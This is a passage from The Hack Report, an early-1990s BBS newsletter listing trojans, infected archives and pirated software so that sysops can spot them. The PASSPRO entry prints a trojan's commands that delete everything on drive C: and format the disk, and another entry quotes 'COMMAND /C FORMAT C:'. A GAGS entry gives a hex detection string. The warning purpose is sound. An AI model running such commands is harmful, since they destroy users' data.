  670.   v2.04).  Bill's tests show that this copy of the archive contains two
  671.   files, INSTALSW.COM and EVERYDAY.COM, that are infected with a
  672.   non-resident "companion" virus that utilizes the Mutation Engine.  It
  673.   also contains the file PCS.EXE, which is infected with a virus created by
  674.   a virus-writing group's "Mass Produce Code Generator."
  675.  
  676.  
  677.   Bill also reports that our old friend, the Power Pump virus, has
  678.   resurfaced inside a file called FX2.  Here's the archive info:
  679.  
  680.                 Length   Date    Time    CRC-32  Attr  Name
  681.                 ------   ----    ----   -------- ----  ----
  682.                  25846 01-01-92  00:00  2635e28a --w-  FX2.EXE
  683.                   1199 01-01-92  00:00  f61885bd --w-  FX2.COM
  684.                  17354 01-01-92  00:00  02eac55c --w-  POWER.EXE
  685.                   1007 01-01-92  00:00  139e1291 --w-  FX2.DOC
  686.                 ------                                 -------
  687.                  45406                                       4
  688.  
  689.   The giveaway here is the file POWER.EXE.  For a full documentation of the
  690.   Power Pump virus, please see the 1992 Full Archive Edition of The Hack
  691.   Report (filename HACK92FA), available from most official distribution
  692.   sites.
  693.  
  694.  
  695.   Travis Griggs (1:3807/8) forwarded a report from a local board called The
  696.   Forum (phone number 1-318-528-2107) by a user named Susan Pilgreen. The
  697.   message referred to a file called BOUNCE, which she said was infected
  698.   with the Beeper (Russian Mirror) virus.  The file, according to Travis,
  699.   claimed to be a game.  Travis has now forwarded the file information on
  700.   this archive:
  701.  
  702.       Filename       Original DateTime modified CRC-32   Attr BTPMGVX
  703.       ------------ ---------- ----------------- -------- ----------
  704.       BOUNCE.COM         4053 80-01-01 00:02:04 35C562AF A--W B 1
  705.       BOUNCE.DAT       119101 92-11-20 23:16:10 247712A8 A--W B 0
  706.       BOUNCE.DOC          348 92-11-20 23:21:46 B28557FE A--W B 1
  707.       ------------ ----------
  708.           3 files      123502
  709.  
  710.  
  711.   Geoffrey Liu (1:229/15) reports in the FidoNet WARNINGS echo on a file
  712.   called BWE.  This claims to provide a "quick and easy way to exit
  713.   Windows."  Geoffrey forwards this file info and disassembly report from
  714.   John Eady (1:229/15, john.eady@canrem.com):
  715.  
  716.             Name          Length   Mod Date    Time     CRC
  717.             ============  ======== =========  ======== ========
  718.             LICENSE.TXT       2656 14 Feb 93  22:01:14 46B50814
  719.             ORDER.TXT         2335 12 Feb 93  12:00:18 9D1A705E
  720.             README.TXT        3565 14 Feb 93  23:08:08 3EA7548E
  721.             BWE.EXE          19517 14 Feb 93  23:02:34 F1729CA4
  722.             ============  ======== =========  ======== ========
  723.             *total     4     28073 14 Feb 93  23:08:08
  724.  
  725.   "After debugging part of the virus, the following text appears (encrypted)
  726.   in the infected program:
  727.  
  728.         It's time for a math test curtesy of YAM!
  729.  
  730.         And the question is...
  731.  
  732.         What is 00 + 00 =
  733.  
  734.         WRONG!!!! TRY AGAIN!
  735.  
  736.         Admiral Bailey
  737.  
  738.   "This virus is self-encrypting, but does not use any stealth techniques
  739.   (as far as I've seen). It doesn't appear to infect the boot record, or
  740.   the boot partition record. It does not appear to infect .SYS files, or
  741.   .OV? files.
  742.  
  743.   "If you feel you have been infected, examine any EXE or COM files that you
  744.   believe are infected. Check the 4th and 5th bytes in a COM file for the
  745.   characters "BA". Check the 12th and 13th bytes in a EXE file for the
  746.   characters "BA". If you find a file like this, chances are you have been
  747.   infected."
  748.  
  749.  
  750.   Michael Toth (1:115/439.7) has received a report from a local SysOp, Matt
  751.   Glosson of Audio Adrenalin, of a copy of TheDraw v4.60 (filename
  752.   TDRAW460) that was uploaded to him with a few "modifications."  The file
  753.   contained a "ZIP Comment" that had an ANSI bomb embedded in it, and also
  754.   had a file called UFO!.COM inside the archive which would perform an
  755.   unconditional format on your hard drive.  (Editorial - for Ian Davis'
  756.   sake, I wish folks would leave TheDraw alone for a while.  No one program
  757.   or programmer deserves this much abuse. - lj)
  758.  
  759.  
  760.   Mike Wenthold (1:271/47) found a program under the filename GS2000 which
  761.   contained the VCL 3 [Con] Virus.  The archive contains the following
  762.   files:
  763.  
  764.                Length    Date     Time    CRC      Filename
  765.               ======== ========= ====== ======== ============
  766.                   1984 22-Dec-91 01:40p 3527B16B GS2000.COM
  767.                    543 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
  768.               ======== ========= ====== ======== ============
  769.                   2527                           2 files.
  770.  
  771.   The compression method (on this ZIP archive) was not included in his
  772.   data.  According to Dave Lartique (1:3800/22) and Chris Gramer
  773.   (1:271/47), the program is an "unprotect" for MicroProse's game Gunship
  774.   2000.  This appears to be another isolated incident of an infected
  775.   legitimate file.
  776.  
  777.  
  778.   William Gordon (1:369/104) reports BEV105, a file that claims to be a
  779.   "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  780.   two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  781.   installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  782.   This program asks for some sort of wildcard according to William, then
  783.   proceeds to delete everything on your drive that matches that wildcard.
  784.   However, it doesn't stop there:  it continues on and deletes all .bat,
  785.   .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  786.   says the file "comes with the following virii:  Bootkill and Genesis."
  787.  
  788.   A copy of this file was sent to Mr. White and Mr. Logan, who were able to
  789.   confirm the behaviour that William reported.  For the complete results of
  790.   their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
  791.   in the archive version of The Hack Report.
  792.  
  793.  
  794.   More from  HW Bill Lambdin: he forwards a message from Terry Goodman in
  795.   the U'NI Net virus conference concerning the file SCOMP.  This was
  796.   advertised as a compression utility with better compression than PKZip.
  797.   The file passes all virus checkers unless you also check data files in
  798.   addition to executables.  In short, the executable loads a file called
  799.   SCOMP.DAT, which it uses to create a file called CASPER.COM, which is
  800.   apparently the Casper virus.
  801.  
  802.  
  803.   Another report from Bill concerns a file he located called TAXTIP93.
  804.   This archive contains a file called TAXTIP93.DAT, which the executable
  805.   file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
  806.   WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.
  807.  
  808.  
  809.   Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
  810.   was described with a very short line ("'Password,' or some other short
  811.   word," according to Brian).  The archive contained these files:
  812.  
  813.                                PASS    .PA1
  814.                                PASS    .PA2
  815.                                PASS    .PA3
  816.                                PASSWORD.COM
  817.  
  818.   Brian looked inside the .com file, which he says looks like a compiled
  819.   batch file, and found these strings/commands:
  820.  
  821.       Please Wait While Loading;
  822.       It may take in between 30seconds to 5 minutes
  823.       To unshrink nessessary files
  824.       Please Turn off Screen, and wait for the beep.
  825.       If You do not, your screen might not function
  826.       the way it should.
  827.       Turn Off Screen now, and press the space bar.
  828.  
  829.       /C REN pass.pa1 pa.exe
  830.       pass.pa2 /C DEL c:\*.*
  831.       pass.pa2 /C DEL c:\dos\*.*
  832.       /C REN pa.exe pass.pa1
  833.       pass.pa3 FORMAT
  834.       c:
  835.       /C CLS
  836.  
  837.   As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
  838.   with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
  839.   contains the single letter 'Y', and PASS.PA3 contains the single word
  840.   'Yes'.  From the looks of things, this turns out to be a multipartite
  841.   Trojan that attempts to format (what else?) your hard drive.
  842.  
  843.  
  844.   Another multipartite Trojan was spotted by James Frazee (1:343/58), under
  845.   the filename ADD_IT.  It contains these files:
  846.  
  847.                   Name of File    Size  Date
  848.                   ADD_IT.ARJ     40888 02-11-93
  849.                   =======================================
  850.                   ADDIT1   DAT     34283 07-20-91   2:13a
  851.                   ADD_IT   ANS       646 02-11-93   8:31p
  852.                   ADDIT2   DAT     20634 04-09-91   5:00a
  853.                   ADDIT    DOC       177 02-11-93   7:28p
  854.                   ADDIT    COM      1391 02-11-93   8:14p
  855.                   ADDIT3   DAT       138 02-11-93   8:13p
  856.                   THEDRAW  PCK       650 02-11-93   8:31p
  857.  
  858.   When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
  859.   end result was that the program deleted all of the files in the directory
  860.   in which it was run.
  861.  
  862.  
  863.   Matt Hargett (1:2430/1532) found a file called DRSLEEP which he says has
  864.   a "cheap virii (sic) in it," but actually appears to be a Trojan.  When
  865.   the executable, DRSLEEP.EXE is run, it deletes your COMMAND.COM file.
  866.   Not much to write home about, but nasty enough.  Thanks, Matt.
  867.  
  868.  
  869.   John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
  870.   that Lance Merlen (1:107/614) received an upload of this file, which,
  871.   when checked with McAfee's ViruScan v100, reported over 5 viruses in the
  872.   files in the archive.  No internal archive data was provided, so it is
  873.   hard to say whether or not this is an isolated incident.
  874.  
  875.  
  876.   Zack Jones (formerly 1:387/641: new address not yet known) reports a file
  877.   called GAGS which was seen in the San Antonio area.  The file, described
  878.   as "Some Christmas practical jokes," was analyzed by Bill Dirks (1:
  879.   385/17) and confirmed as a Trojan. The program grabs control of several
  880.   interrupt vectors, including the critical error handler.  The only way to
  881.   stop it once it starts is to hit the reset button or power down.
  882.  
  883.   When invoked, it displays a countdown from 8 to 0, which corresponds to
  884.   drives H through A, in that order.  For each found drive, it overwrites
  885.   the first 255 sectors with random data from a block of memory.  To add
  886.   insult to injury, if drives B and A are empty, you are prompted to insert
  887.   disks (so that they can be trashed as well).
  888.  
  889.   After this, the Trojan displays the message, including something like,
  890.   "the disk was trashed but it's only a joke and they are only kidding."
  891.   It then prompts you to reboot, which is rather hard to do unless you have
  892.   a bootable "panic disk" floppy on hand - you certainly won't be able to
  893.   boot from your HD.
  894.  
  895.   Bill says that if your HD is smaller than 60 megs, you're better off
  896.   trying to recover your disk from scratch.  Between 60-120 megs, you have
  897.   a better chance of recovery via disk utilities:  over 120 megs, you
  898.   should be able to accomplish a complete recovery if you're careful and
  899.   you know what you're doing.
  900.  
  901.   Bill posted the following scan string that can be used to detect this
  902.   Trojan - if your scanner can use external strings, be sure to read the
  903.   instructions carefully before trying to add this:
  904.  
  905.                9A46027205B003B9FF00BA0000CD26
  906.  
  907.   If your scanner requires a name for the string, Bill suggests using
  908.   "AlamoXmasTrojan."
  909.  
  910.  
  911.   This Trojan report comes from an article in MacWeek magazine, Volume 7,
  912.   Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  913.   VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  914.   1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  915.   shareware compression utility), will reformat any floppy in drive 1 and
  916.   tries to reformat the user's start-up hard drive when launched.
  917.  
  918.   The file can be identified by a 312K sound resource file called "log
  919.   jingle," which is digitized sound from the Ren and Stimpy cartoons.
  920.  
  921.  
  922.   Other previously reported Trojans:
  923.  
  924.   Filename  Claimed use/Actual activity/Reporter(s)
  925.   ========  ==============================================================
  926.   AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
  927.             something called the "Malhavoc Trojan," which displays a verse
  928.             from a Toronto band and attacks files/sectors on drives C:
  929.             through F:.  Reported by HW Todd Clayton and by George Goode
  930.             (1:229/15).
  931.  
  932.   ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
  933.             Doodle and AntiChrist viruses.  Can trash hard drives as well
  934.             through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
  935.             and under the filename RUNME by Stephen Furness (1:163/273).
  936.  
  937.   AVENGER   Advertised as an "amazing game that supports all kind of sound
  938.             cards...."  Contains 2 internal password-protected .ZIP format
  939.             files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
  940.             the program to the files RUNTIME1.COM (N1 virus) and
  941.             RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
  942.             HW Bill Lambdin.
  943.  
  944.   BATMAN    No claim reported - searches your DOS path and tries to "delete
  945.             the executable file that loads WildCat BBSs."  Reported by
  946.             James Powell (Intelec PC-Security Conf.), via HW Bill Lambdin.
  947.  
  948.   CHROME    Possible isolated incident - contains a file, FGDS.COM, which
  949.             contains text that says "Skism Rythem Stack Virus-808."
  950.             Reported by Richard Meyers and forwarded by Larry Dingethal
  951.             (1:273/231).
  952.  
  953.   DBSOUND   Possible isolated incident - claimed update of the Drum
  954.             Blaster .MOD file player.  Deletes all files in the current
  955.             directory and all of its subdirectories.  From "Khamsin #1
  956.             @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
  957.             from Ken Green of the CentraLink BBS.
  958.  
  959.   GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
  960.             is a renamed copy of DELDIR.COM, a directory remover and file
  961.             deletion tool.  Reported by Andreas Reinicke (2:284/402).
  962.  
  963.   LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
  964.             reports as being infected with the VCL virus when checked with
  965.             McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).
  966.  
  967.   MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
  968.             key of your keyboard to invoke DEBUG and create a couple of
  969.             Trojans from script files.  Reported by Bill Dirks.
  970.  
  971.   OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
  972.             list and places it in your download directory.  Reported by
  973.             HW Nemrod Kedem.
  974.  
  975.   QOUTES    Not a misspelling - claimed Christmas quotation generator.
  976.             Overwrites the first 128 cylinders of your first HD, requiring
  977.             a low level format to overcome the damage (IDE drives may need
  978.             to go back to the factory).  Reported by Gary Marden
  979.             (2:258/27).
  980.  
  981.   QSCAN20   Claimed small virus scanner - when run, identifies itself as
  982.             "being a stealth bomber" and attacks your hard drive's FAT.
  983.             Reported by Art Mason (1:229/15).
  984.  
  985.   RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
  986.             the OPTIBBS file reported above.  Reported by Peter Janssens
  987.             (2:512/1).
  988.  
  989.   RAFIX     "Fixes little bugs" in RemoteAccess - program contains the
  990.             string "COMMAND /C FORMAT C:" internally.  Reported by Sylvain
  991.             Simard (1:242/158).
  992.  
  993.   RAMANAGE  Claimed USERS.BBS manager for RemoteAccess - yet another
  994.             file that makes an archive of this file (MIX1.ARJ or WISE.ARJ)
  995.             and places it in a download directory.  Reported by Peter
  996.             Janssens.
  997.  
  998.             NOTE - Peter Hoek (2:281/506.15) reports a program that does
  999.             the same thing, but uses the archive name RUNNING.ARJ to
  1000.             hold the USERS.BBS file.  No name of the Trojan was supplied.
  1001.  
  1002.   REAPER    ANSI bomb - remaps the keyboard to force file deletion and
  1003.             hard disk formatting - also generates insults.  Reported by
  1004.             Victor Padron (1:3609/14), via Rich Veraa (1:135/907).
  1005.  
  1006.   REDFOX    Batch file which deletes all DOS and system files.  Reported
  1007.             by Mike Wenthold.
  1008.  
  1009.   ROLEX     Possible isolated incident of an infection by the Keypress
  1010.             [Key] virus.  Reported by David Gibbs, via Michael Toth
  1011.             (1:115/220).
  1012.  
  1013.   SBBSFIX   Tries to format drive C: - contains two files, SBBSFIX.EXE and
  1014.             COM_P.OVL.  Reported by Clayton Mattatall (1:247/400).
  1015.  
  1016.   SPEED     Claims to "check your PC speed" - actually deletes all files
  1017.             on drive C:, including directories.  Reported by HW Nemrod
  1018.             Kedem.
  1019.  
  1020.   XYPHR2    No claim - contains the Power Pump companion virus (documented
  1021.             in the 1992 Full Archive of this report).  Reported by Mark
  1022.             Histed (1:268/332).
  1023.  
  1024.   YPCBR101  A copy of this file, uploaded to Simtel-20 and the oak mirror
  1025.             on archie.au, contained an infection of the Dark Avenger
  1026.             virus in the file YAPCBR.EXE.  Was supposed to be re-released
  1027.             as a clean archive.  Reported by John Miezitis (Internet,
  1028.             John.Miezitis@cc.utas.edu.au).
  1029.  
  1030.   =========================================================================
  1031.  
  1032.                         Pirated Commercial Software
  1033.  
  1034.   Program                 Archive Name(s)     Reported By
  1035.   =======                 ===============     ===========
  1036. | 2400 A.D. (game)        2400AD              Kevin Brott (Internet,
  1037. |                                       dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
  1038.  
  1039.   3-D Pool                3DPOOL              Michael Gibbs (via HW Bill
  1040.                                                Lambdin)
  1041.  
  1042. | 4DOS v4.02 (reg.)       4DOS402R            HW Scott Raymond
  1043. |                         4DOSREG
  1044.  
  1045.   Alone in the Dark       ALONEDEM            Mark Mistretta (1:102/1314)
  1046.    (full game-not a demo)
  1047.  
  1048.   ArcMaster (registered)  AM91REG             HW Scott Raymond
  1049. |                         AM92REG
  1050.  
  1051.   Arctic Fox (game, by    AFOX                from the Meier/Morlan List,
  1052.    Electronic Arts)                            conf. by HW Emanuel Levy
  1053.                                                and Brendt Hess (1:105/362)
  1054.  
  1055. | Arkanoid II: Revenge    ARKNOID             James Crawford (1:202/1809)
  1056. |  of DoH (game)
  1057.  
  1058.   Atomix (game)           ATOMIX_             HW Matt Kracht
  1059.  
  1060.   A-Train by Maxis        ATRAIN1  through    Chris Blackwell of Maxis
  1061.                           ATRAIN6, also        (zoinks@netcom.com)
  1062.                           A-TRAIN1 through
  1063.                           A-TRAIN6
  1064.  
  1065. | BannerMania             BANMANIA            Harold Stein (1:107/236)
  1066.  
  1067.   Battle Chess            CHESS               Ron Mahan (1:123/61)
  1068.  
  1069.   BeetleJuice (game)      BEETLE              Mark Harris (1:121/99)
  1070.                           BETLEJUC            Jason Robertson (1:250/802.2)
  1071.                           BJUICE              Alan Hess (1:261/1000)
  1072.                           BJ                  Bill Blakely
  1073.                                                (RIME Shareware echo)
  1074.                           BTLJWC              the Hack Squad
  1075.                                                (1:124/4007)
  1076.  
  1077. | Big Bird (game?)        BIGBIRD             Cindy McVey, via Harold Stein
  1078.  
  1079.   Budokan: the Martial    BUDOKAN             Michael Gibbs (Intelec, via
  1080.    Spirit (game)                               HW Bill Lambdin)
  1081.  
  1082. | Caveman Ninja           CAVEMAN             Dave Lartique (1:3800/22),
  1083. |                                              ver. by HW Emanuel Levy
  1084.  
  1085.   Check-It PC             CHECKIT             HW Bert Bredewoud
  1086.    Diagnostic Software    CHKIT20             HW Bill Lambdin
  1087.  
  1088.   Cisco Heat (game)       CISCO               Jason Robertson
  1089.  
  1090.   Commander Keen Pt. 5    _1KEEN5             Scott Wunsch (1:140/23.1701)
  1091. |                         KEEN5E              Carson Hanrahan (CompuServe,
  1092. |                                              71554,2652)
  1093.  
  1094. | CompuShow GIF Viewer    CSHW860B            HW Scott Raymond
  1095.  
  1096.   Copy II PC              COPYPC70            Ryan Park (1:283/420)
  1097.  
  1098. | Cyber Chess             C-CHESS             Shane Paul, RIME, via HW
  1099. |                                              Richard Steiner
  1100.  
  1101.   Darkside (game)         DARKSIDE            Ralph Busch (1:153/9)
  1102.  
  1103.   DiskDupe Pro v4.03      DD403PRO            Jan Koopmans (2:512/163)
  1104.  
  1105.   Energizer Bunny Screen  ENERGIZR            Kurt Jacobson, PC Dynamics,
  1106.    Saver for Windows                           Inc., via HW Bill Dennison
  1107.  
  1108. | FAST! Disk Cache        FAST_1V4            Ryan Park (1:283/420), via
  1109. |  v4.03.08                                    HW Bill Lambdin
  1110.  
  1111.   Family Feud (game)      FAM-FEUD            Harold Stein
  1112.  
  1113.   F-Prot Professional     FP206SF             Mikko Hypponen
  1114.                                                (mikko.hypponen@compart.fi)
  1115.  
  1116. | GEcho Mail Tosser       GE_1000K            HW Scott Raymond
  1117.  
  1118.   GifLite 2.0 (regist.)   GL2-ECR             HW Scott Raymond
  1119.  
  1120.   Golden Axe (game)       GOLDAXE             Harold Stein
  1121.  
  1122. | HyperWare Speedkit      SPKT460R            HW Scott Raymond
  1123. |  v4.60 (registered)
  1124.  
  1125.   Ian Bothams Cricket     IBCTDT              Vince Sorensen (1:140/121)
  1126.  
  1127.   Intelcom Modem Test     TESTCOM             from the Meier/Morlan List,
  1128.    Utility (dist. with                         confirmed by Onno Tesink
  1129.    Intel modems)                               (RIME, via HW Richard
  1130.                                                Steiner)
  1131.  
  1132. | Jetsons (game)          JETSONS             Kevin Brott (Internet,
  1133. |                                       dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
  1134.  
  1135.   Jill of the Jungle      JILL2               Harold Stein
  1136. |  (non-shareware files)  JILL3
  1137.                           $JILL2              HW Bert Bredewoud
  1138.                           $JILL3
  1139.  
  1140.   Killing Cloud (game)    CLOUD               Mike Wenthold
  1141.  
  1142.   Kings of the Beach      VBALL               Jason Robertson
  1143.    (game)
  1144.  
  1145.   Life & Death (game)     L&D1                Harold Stein
  1146.                           L&D2
  1147.  
  1148.   MegaMan (game)          MEGAMAN             HW Emanuel Levy
  1149.  
  1150.   Microsoft Flight        FS                  Michael Gibbs (Intelec, via
  1151.    Simulator                                   HW Bill Lambdin)
  1152.  
  1153. | MS-DOS 6.0              MSDOS6-1            Harold Stein
  1154. |                         MSDOS6-2
  1155. |                         MSDOS6-3
  1156.  
  1157.   Oh No, More Lemmings    ONMLEMM             Larry Dingethal (1:273/231)
  1158.    (complete-not demo)
  1159.  
  1160.   Over the Net            OTNINC1             Tim Sitzler (1:206/2708)
  1161.    (volleyball game)
  1162.  
  1163. | PGA Tour Golf           GOLF                HW Bill Lambdin
  1164.  
  1165.   PKLite (registered)     PKL15REG            HW Scott Raymond
  1166.  
  1167.   PKZip v2.04c            PK204REG            HW Scott Raymond
  1168.    (Registered)
  1169.  
  1170.   PKZip v2.04c            PKZCFG              Mark Mistretta (1:102/1314)
  1171.    Configuration Editor
  1172.  
  1173.   PKZip v2.04e            PK204ERG            HW Scott Raymond
  1174.    (Registered)
  1175.  
  1176.   PKZip v2.04g            PKZ204R             HW Bill Dennison
  1177.    (Registered)
  1178.  
  1179. | Populous (game)         POPULOUS            Harold Stein
  1180.  
  1181. | The Price is Right      PRICE               Harold Stein
  1182. |  (game)
  1183.  
  1184. | Prince of Persia        PRINCE              Kenneth Darling (2:231/98.67)
  1185. |                                             Eric Alexander (1:3613/10)
  1186. |                                             HW Emanuel Levy
  1187.  
  1188.   PrintShop               PSHOP               Michael Gibbs, Intelec, via
  1189.                                                HW Bill Lambdin
  1190.  
  1191.   Psion Chess             3D-CHESS            Matt Farrenkopf (1:105/376)
  1192.  
  1193. | Pyro! PC                DOSPYRO             Jay Kendall (1:141/338), via
  1194. |  (Fifth Generation)                          HW Scott Raymond
  1195.  
  1196.   Q387 (registered)       Q387UTG             Michael Toth (1:115/439.7)
  1197.  
  1198.   QModem Pro              QMPRO-1             Mark Mistretta
  1199.                           QMPRO-2
  1200.  
  1201. | QuickLink II Fax v2.0.2 QLINK1              Carson Hanrahan (CompuServe,
  1202. |                         QLINK2               71554,2652)
  1203.  
  1204.   Rack 'Em (game)         RACKEM              Ruth Lee (1:106/5352)
  1205.  
  1206.   Microsoft Ramdrive      RAMDRIVE            Barry Martin (Intelec, via
  1207.                                                 HW Bill Lambdin)
  1208.  
  1209.   Sequencer Plus Pro      SPPRO               Tom Dunavold (Intelec,
  1210.                                                via Larry Dingethal)
  1211.  
  1212.   Shadow Warriors (game)  SHADOWG             Mark Mistretta
  1213.  
  1214.   Sharky's 3D Pool        POOL                Jason Robertson (1:250/801)
  1215.  
  1216.   Shez (Registered)       SHEZ84R             Eric Vanebrick (2:291/712)
  1217.                           SHEZ85R             HW Scott Raymond
  1218.                           SHEZ87R
  1219.                           SHEZ88R
  1220.                           SHEZ89R
  1221.  
  1222.   SideKick 2.0            SK3                 Harold Stein
  1223.  
  1224.   SimCity (by Maxis)      SIM_CITY            Kevin Brott (Internet,
  1225.                                         dp03%ccccs.uucp@pdxgate.cs.pdx.edu)
  1226.                           SIMCTYSW            Scott Wunsch
  1227.  
  1228.   Smartdrive Disk Cache   SMARTDRV            Barry Martin (Intelec, via
  1229.                                                 HW Bill Lambdin)
  1230.                           SMTDRV40            Michael Toth (1:115/220)
  1231.  
  1232. | Squish 2.1              SQUISH              Jason Robertson (1:250/802.2)
  1233.    (Sundog Software)      SQUISH21            Several (ver. by Joe Morlan)
  1234.  
  1235.   Star Control Vol. 4     STARCON             Carson M. Hanrahan
  1236.                                                (CompuServe 71554,2652)
  1237.  
  1238.   Streets on a Disk       STREETS             Harvey Woien (1:102/752)
  1239.  
  1240.   Teledisk (files         TDISK214            Mark Mistretta
  1241.    dated after Apr. 1991)
  1242.                           TELE214R            Staale Fagerland (Internet,
  1243.                                              staale.fagerland@euronetis.no)
  1244.  
  1245. | TheDraw v4.61 (reg.)    TDRW461R            HW Scott Raymond
  1246.  
  1247.   Vegas Casino 2 (game)   VEGAS2              The Hack Squad
  1248.  
  1249. | VOpt Disk Defragmenter  VOPT30              The Hack Squad
  1250.  
  1251.   VPic v6.0 (registered)  VPIC60CR            HW Scott Raymond
  1252.  
  1253. | Wheel of Fortune        WHEEL               Harold Stein
  1254.  
  1255. | Where in the USA is     CARMENUS            Cindy McVey, via Harold Stein
  1256. |  Carmen Sandiego?
  1257.  
  1258. | Where in Time is        CARMENT             Cindy McVey, via Harold Stein
  1259. |  Carmen Sandiego?
  1260.  
  1261.   WinWay Resume for       WINRES              Erez Carmel (CompuServe,
  1262.    Windows                                      70523,2574)
  1263.  
  1264.   World Class Rugby       WCRFNTDT            Vince Sorensen
  1265.  
  1266.   ZipMaster (registered)  ZM31REG             HW Scott Raymond
  1267.  
  1268.   =========================================================================
  1269.  
  1270.                       ?????Questionable Programs?????
  1271.  
  1272.   First, a quick note - this section, along with the Information, Please
  1273.   section, are the only ones that have any information carried over from
  1274.   the 1992 report.  This is because many of the listings in these sections
  1275.   were not completely resolved when the last 1992 issue was published.  As
  1276.   usual, if anyone has any additional information on anything listed in
  1277.   these sections, _please_ help!
  1278.  
  1279.  
  1280. | First, a file that doesn't fit into any of the report categories:  the
  1281. | report from Wen-Chung Wu (1:102/342) concerned the archive PKLT120R,
  1282. | which claims to be version 1.20 of PKLite.  This is actually PKLite
  1283. | Professional v1.12, a commercial product, which has been hacked to show
  1284. | version 1.20 instead of 1.12.  To make matters worse, the PKLITE.EXE file
  1285. | was compressed "by PKLITE itself more than three times and once by
  1286. | LZEXE."  So, what we have here is a hack of a pirated commercial file -
  1287. | jeez, this job gets confusing at times. ;-)
  1288.  
  1289.  
  1290. | Here's an update on the report from Bud Webster (1:264/165.7) on the
  1291. | Apogee game being distributed under the filename BLOCK5.ZIP.  As reported
  1292. | by Matthew Waldron (RIME Shareware Conf., via HW Richard Steiner) and Dan
  1293. | Stratton (via HW Ken Whiton), this program was part of an Apogee disk
  1294. | called the "Super Game Pack," and that it is a game called "Block Five."
  1295. | Joe Siegler (1:124/9006), the online support representative for Apogee
  1296. | Software Productions, confirms this, and states that the majority of the
  1297. | games on this disk, including this one, have been officially
  1298. | discontinued.  The official company stand is that this game should not be
  1299. | distributed via BBS systems, as it is no longer supported in any way by
  1300. | Apogee Software Productions.  Thanks to everyone who helped on this one.
  1301.  
  1302.  
  1303.   HW Bill Lambdin says he found a file in the Knoxville, Tennessee area
  1304.   called BIBLEPR (no description available) that appears a bit suspicious.
  1305.   The file contents are:
  1306.  
  1307.                 Length  Time    CRC-32  Attr  Name
  1308.                 ------  ----   -------- ----  ----
  1309.                  34176  11:26  d267f5de --w-  BIBLEPR.COM
  1310.                 158493  00:04  4298ac2d --w-  DATAPR-0.DAT
  1311.                 158493  00:04  d87adf4b --w-  DATAPR-1.DAT
  1312.                 158493  00:08  1213c6b3 --w-  DATAPR-2.DAT
  1313.                 159764  00:08  38d7cc06 --w-  DATAPR-3.DAT
  1314.                   1572  24:05  3a60c80e --w-  BIBLEPR.DOC
  1315.                 ------                        -------
  1316.                 670991                              6
  1317.  
  1318.   When BIBLEPR.COM executes, Bill says it displays the following message:
  1319.  
  1320.                         Greets from DOA!
  1321.  
  1322.         Don't say I didn't warn you! You are also busted!
  1323.  
  1324.         Expect a visit from the SPA!
  1325.  
  1326.         Omni, I will avenge you!
  1327.  
  1328.   Bill's disassembly shows the file contains two INT 26 calls, which are
  1329.   DOS Absolute Disk Write instructions.  He said that if it contains a
  1330.   virus, he was unable to get it to replicate.  A copy of the archive has
  1331.   been sent to Glenn Jordan at Datawatch Software for testing.
  1332.  
  1333.  
  1334.   Here's an interesting point, brought to my attention by HW Richard
  1335.   Steiner and John Weiss of the RIME Shareware Conference.  In previous
  1336.   issues, I have listed two files, QM60IST1 and QM60IST2 (reported by
  1337.   Francois Thunus, 2:270/25), as pirated copies of QModem v6.0.  However,
  1338.   Richard and John quite correctly point out that there was no release of
  1339.   QModem v6.0 - the program changed to QModem Pro after v5.
  1340.  
  1341.   From what Francois reported, I believe that what he saw was indeed Qmodem
  1342.   Pro, now a commercial-only program.  However, it was "released" under the
  1343.   above filenames.  So, is it a Hack?  Pirated File?  Or what?  Doesn't
  1344.   matter - it shouldn't be distributed.  Thanks, Richard and John, for
  1345.   making me fully engage my brain for a change. <grin>
  1346.  
  1347.  
  1348.   HW Bill Dennison captured a message from Marshall Dudley (Data World BBS,
  1349.   (615)966-3574) in the ILink VIRUS FILE conference about the archive
  1350.   ASCDEMO.  Marshall says that McAfee's ViruScan doesn't detect any
  1351.   infection until after you run it and it has infected other files.  No
  1352.   further information was supplied, other than the internal filenames
  1353.   (ASCDEMO.DOC and ASCDEMO.EXE).  I need further data on this before I can
  1354.   list it in the Trojan Wars section, so please advise if you have any.
  1355.  
  1356.  
  1357.   HW Emanuel Levy says the file IM, reported by Michael Santos in the
  1358.   Intelec Net Chat conference and listed in the 1992 Full Archive edition
  1359.   of The Hack Report.  Michael's report was a "hearsay" report from one of
  1360.   his friends, and stated that the IM screen saver file caused a viral
  1361.   infection.
  1362.  
  1363.   Emanuel says the file is an "outer space screen saver," currently under
  1364.   the filename IM17.  Scott Wunsch (1:140/23.1701) says the program name is
  1365.   "Inner Mission," and he currently has version 1.6.  In both cases, the
  1366.   files were clean.
  1367.  
  1368.   So, it looks like either Michael's friend's system became infected from a
  1369.   different source than the IM file, or that an isolated incident of an
  1370.   infected IM is involved.  No way to tell at this writing.
